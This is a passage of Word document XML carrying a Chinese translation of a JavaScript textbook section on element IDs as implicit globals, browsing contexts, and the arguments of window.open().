        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui[id]=document.getElementById(id);//</w:t>
      </w:r>
      <w:r>
        <w:t>将其存放在一个属性中</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运行完这段代码之后，</w:t>
      </w:r>
      <w:r>
        <w:t>ui.input</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ui.prompt</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ui.heading</w:t>
      </w:r>
      <w:r>
        <w:t>会引用文档元素。脚本可以用全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>heading</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>ui.input</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ui.heading</w:t>
      </w:r>
      <w:r>
        <w:t>。但记得</w:t>
      </w:r>
      <w:r>
        <w:t>14.5</w:t>
      </w:r>
      <w:r>
        <w:t>节里的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象有个方法的名字是</w:t>
      </w:r>
      <w:r>
        <w:t>prompt()</w:t>
      </w:r>
      <w:r>
        <w:t>，所以脚本中不能用全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>prompt</w:t>
      </w:r>
      <w:r>
        <w:t>代替</w:t>
      </w:r>
      <w:r>
        <w:t>ui.prompt</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>元素</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>作为全局变量的隐式应用是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器演化过程中遗留的怪癖。它主要是出于与已有</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面后向兼容性的考虑。但这里并不推荐使用这种做法</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器厂商可以在任何时候为</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义新属性，</w:t>
      </w:r>
      <w:r>
        <w:t>而这些新属性都会破坏使用了此属性名的隐式定义的代码。反之，用</w:t>
      </w:r>
      <w:r>
        <w:t>document.getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>来显式查找元素。如果给它一个更简单的名字，这种用法会变得更加简便。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var$=function(id){return document.getElementById(id);};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.prompt=$("prompt");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>很多客户端类库都定义了</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>函数，类似上面一样来通过</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>查找元素。（我们会在第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章里看到</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>函数作为通用的元素选择方法，基于</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>、标签名、</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性或其他标准</w:t>
      </w:r>
      <w:r>
        <w:t>，返回一个或多个元素。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>假设</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>并没有被</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象使用的话，那么任何有</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素都会成为全局变量的值。以下</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素如果有</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性的话，也会这样表现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>applet</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>embed</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>frameset</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>元素在文档中必须是唯一的：两个元素不能有相同的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>。但是，这对</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性无效。如果上面的元素有多于一个有相同的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性（或者一个元素有</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性，而另一个元素有相同值的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性），</w:t>
      </w:r>
      <w:r>
        <w:t>具有该名称的隐式全局变量会引用一个类数组对象，这个类数组对象的元素是所有命名的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性的＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素是个特殊的例子。为它们隐式创建的变量不会引用表示元素自身的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而是引用表示＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素创建的嵌套浏览器窗体的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。我们会在</w:t>
      </w:r>
      <w:r>
        <w:t>14.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节再次谈论它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="347" w:name="14_8_Duo_Chuang_Kou_He_Chuang_Ti_"/>
      <w:r>
        <w:t>14.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　多窗口和窗体</w:t>
      </w:r>
      <w:bookmarkEnd w:id="347"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器窗口可能在桌面上包含多个标签页。每一个标签页都是独立的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>浏览上下文</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>browsing context</w:t>
      </w:r>
      <w:r>
        <w:t>），每一个上下文都有独立的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而且相互之间</w:t>
      </w:r>
      <w:r>
        <w:t>互不干扰。每个标签页中运行的脚本通常并不知道其他标签页的存在，更不用说和其他标签页的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象进行交互操作或者操作其文档内容了。如果</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器不支持多标签页，或者把标签页关掉了，可能在某一时刻桌面上会有很多打开的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器窗口。而使用标签页，每个桌面窗</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>口中的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象都是独立的，也就是说彼此就是完全独立的，和其他桌面窗口没有任何联系。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但是窗口并不总是和其他窗口完全没关系。一个窗口或标签页中的脚本可以打开新的窗口或标签页，当一个脚本这样做时，这样多个窗口或窗口与另一个窗口的文档之间就可以互操</w:t>
      </w:r>
      <w:r>
        <w:t>作（可以参照</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节中讲解的同源策略约束）。</w:t>
      </w:r>
      <w:r>
        <w:t>14.8.1</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍关于窗口打开和关闭的更多内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档经常使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞来嵌套多个文档。由＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞所创建的嵌套浏览上下文是用它自己的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象所表示的。废弃的＜</w:t>
      </w:r>
      <w:r>
        <w:t>frameset</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素同样创建了一个嵌套的浏览上下文，每一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>＞都由一个独立的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示。对于客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来说，窗口、标签页、</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>和框架都是浏览上下文；对于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来说，它们都是</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。和相互独</w:t>
      </w:r>
      <w:r>
        <w:t>立的标签页不同，嵌套的浏览上下文之间并不是相互独立的。在一个窗体中运行的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序总是可以看到它的祖先和子孙窗体，尽管脚本查看这些窗体中的文档受到同源策略的限制。</w:t>
      </w:r>
      <w:r>
        <w:t>14.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节会讲到嵌套的窗体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>是客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的全局对象，每个窗口或窗体都包含独立的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>执行上下文。不过，在一个窗口中的</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Script</w:t>
      </w:r>
      <w:r>
        <w:t>代码，如果有同源策略的限制，则可以使用另外一个窗口中定义的对象、属性和方法。与此相关的细节会在</w:t>
      </w:r>
      <w:r>
        <w:t>14.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节中详细讨论。当由于同源策略的限制导致窗口</w:t>
      </w:r>
      <w:r>
        <w:t>之间无法直接交互时，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>提供一个基于事件的消息传输</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，可以用于间接的通信。这在</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节中会有详细讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="348" w:name="14_8_1_Da_Kai_He_Guan_Bi_Chuang_Kou_"/>
      <w:r>
        <w:t>14.8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　打开和关闭窗口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="348"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以打开一个新的浏览器窗口（或标签页，这通常和浏览器的配置选项有关）。</w:t>
      </w:r>
      <w:r>
        <w:t>Window.open()</w:t>
      </w:r>
      <w:r>
        <w:t>载入指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>到新的或已存在的窗口中，并返回代表那个窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。它有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个可选的参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个参数是要在新窗口中显示的文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。如果这个参数省略了（也可以是空字符串），那么会使用空页面的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r>
        <w:t>about:blank</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数是新打开的窗口的名字。如果指定的是一个已经存在的窗口的名字（并且脚本允许跳转到那个窗口），会直接使用已存在的窗口。否则，会打开新的窗口，并将这个指定的名字赋值给它。如果省略此参数，会使用指定的名字</w:t>
      </w:r>
      <w:r>
        <w:t>"_blank"</w:t>
      </w:r>
      <w:r>
        <w:t>打开一个新的、未命名的窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要注意的是，脚本是无法通过简单地猜测窗口的名字来操控这个窗口中的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用的，只有设置了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>允许导航</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>allowed to navigate</w:t>
      </w:r>
      <w:r>
        <w:t>）（</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>规范中的术语）的页面才可以这样。宽泛地讲，当且仅当窗口包含的文档</w:t>
      </w:r>
      <w:r>
        <w:t>来自相同的源或者是这个脚本打开了那个窗口（或者递归地打开了窗口中打开的窗口），脚本才可以只通过名字来指定存在的窗口。还有，如果其中一个窗口是内嵌在另一个窗口里的窗体，那么在它们的脚本之间就可以相互导航。这种情况下，可以使用保留的名字</w:t>
      </w:r>
      <w:r>
        <w:t>"_top"</w:t>
      </w:r>
      <w:r>
        <w:t>（顶级祖先窗口）和</w:t>
      </w:r>
      <w:r>
        <w:t>"_parent"</w:t>
      </w:r>
      <w:r>
        <w:t>（直接父级窗口）来获取彼此的浏览上下文。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>窗口名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>窗口的名字是非常重要的，因为它允许</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法引用已存在的窗口，并同时可以作为＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上</w:t>
      </w:r>
      <w:r>
        <w:t>HTML target</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值，用来表示引用的文档（或表单提交结果）应该</w:t>
      </w:r>
      <w:r>
        <w:t>显示在命名的窗口中。这个</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值可以设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"_blank"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"_parent"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"_top"</w:t>
      </w:r>
      <w:r>
        <w:t>，从而使引用的文档显示在新的空白窗口、父窗口</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>窗体或顶层窗口中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象如果有</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性，就用它保存名字。该属性是可写的，并且脚本可以随意设置它。如果传递给</w:t>
      </w:r>
      <w:r>
        <w:t>window.open()</w:t>
      </w:r>
      <w:r>
        <w:t>一个除</w:t>
      </w:r>
      <w:r>
        <w:t>"_blank"</w:t>
      </w:r>
      <w:r>
        <w:t>之外的名字，通过该调用创建的窗口将以该名字作为</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>性的初始值。如果＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素有</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性，表示该</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象会用它作为</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性的初始值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>第三个可选参数是一个以逗号分隔的列表，包含大小和各种属性，用以表明新窗口是如何打开的。如果省略这个参数，那么新窗口就会用一个默认的大小，而且带有一整组标准的</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>组件，即菜单栏、状态栏、工具栏等。在标签式浏览器中，会创建一个新的标签。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另一方面，如果指定这个参数，就可以指定窗口的尺寸，以及它包含的一组属性。（显式指定窗口尺寸更像是创建新窗口，而不是新标签。）例如，要打开允许改变大小的浏览器窗口，并且包含状态栏、工具栏和地址栏，就可以这样写：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var w=window.open("smallwin.html"</w:t>
      </w:r>
      <w:r>
        <w:t>,"smallwin",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"width=400,height=350,status=yes,resizable=yes");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第三个参数是非标准的，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>规范也主张浏览器应该忽略它。参见第四部分中的</w:t>
      </w:r>
      <w:r>
        <w:t>Window.open()</w:t>
      </w:r>
      <w:r>
        <w:t>查看在此参数中可以指定什么内容。注意，当指定第三个参数时，所有没有显式指定的功能都会忽略。出于各种安全原因，浏览器包含对可能指定的功能的限制。例</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如，通常不允许指定一个太小的或者位于屏幕之外的窗口，并且一些浏览器不允许创建一个没有状态栏的窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>的第四个参数只在第二个参数</w:t>
      </w:r>
      <w:r>
        <w:t>命名的是一个存在的窗口时才有用。它是一个布尔值，声明了由第一个参数指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>是应用替换掉窗口浏览历史的当前条目（</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>），还是应该在窗口浏览历史中创建一个新的条目（</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>），后者是默认的设置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值是代表命名或新创建的窗口的</w:t>
